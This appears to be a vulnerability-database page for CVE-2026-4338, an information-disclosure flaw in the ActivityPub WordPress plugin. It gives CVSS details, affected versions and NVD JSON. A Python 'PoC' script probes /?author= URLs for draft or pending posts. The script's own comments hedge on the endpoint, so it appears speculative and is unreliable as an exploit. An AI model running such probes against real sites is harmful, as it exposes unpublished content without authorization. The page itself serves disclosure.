Security Vulnerability Report
中文
CVE-2026-4338 CVSS 7.5 HIGH

CVE-2026-4338

Published: 2026-04-08 07:16:22
Last Modified: 2026-04-14 16:23:09

Description

The ActivityPub WordPress plugin before 8.0.2 does not properly filter posts to be displayed, allowed unauthenticated users to access drafts/scheduled/pending posts

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:automattic:activitypub:*:*:*:*:*:wordpress:*:* - VULNERABLE
ActivityPub WordPress Plugin < 8.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-4338 (ActivityPub Plugin Information Disclosure) import requests def check_vulnerability(target_url): # Attempt to access the ActivityPub feed which might expose drafts # The endpoint usually looks like /?author=ID or similar depending on config headers = { 'User-Agent': 'CVE-2026-4338-Scanner' } # Testing common author endpoints to find exposed posts for author_id in range(1, 5): url = f"{target_url.rstrip('/')}/?author={author_id}" try: response = requests.get(url, headers=headers, timeout=5) if response.status_code == 200: print(f"[+] Requested {url}") # Check for keywords indicating draft or pending status in the HTML/JSON response if "draft" in response.text.lower() or "pending" in response.text.lower(): print(f"[!] Potential sensitive content found for Author ID {author_id}") return True except Exception as e: print(f"[-] Error connecting to {url}: {e}") return False if __name__ == "__main__": target = "http://example.com" # Replace with target check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4338", "sourceIdentifier": "[email protected]", "published": "2026-04-08T07:16:22.400", "lastModified": "2026-04-14T16:23:09.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ActivityPub WordPress plugin before 8.0.2 does not properly filter posts to be displayed, allowed unauthenticated users to access drafts/scheduled/pending posts"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:automattic:activitypub:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "8.0.2", "matchCriteriaId": "DAE437C7-2591-4773-8749-33B18122E30C"}]}]}], "references": [{"url": "https://wpscan.com/vulnerability/50f68395-72fc-4f99-8e6d-6aa90cc640b5/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}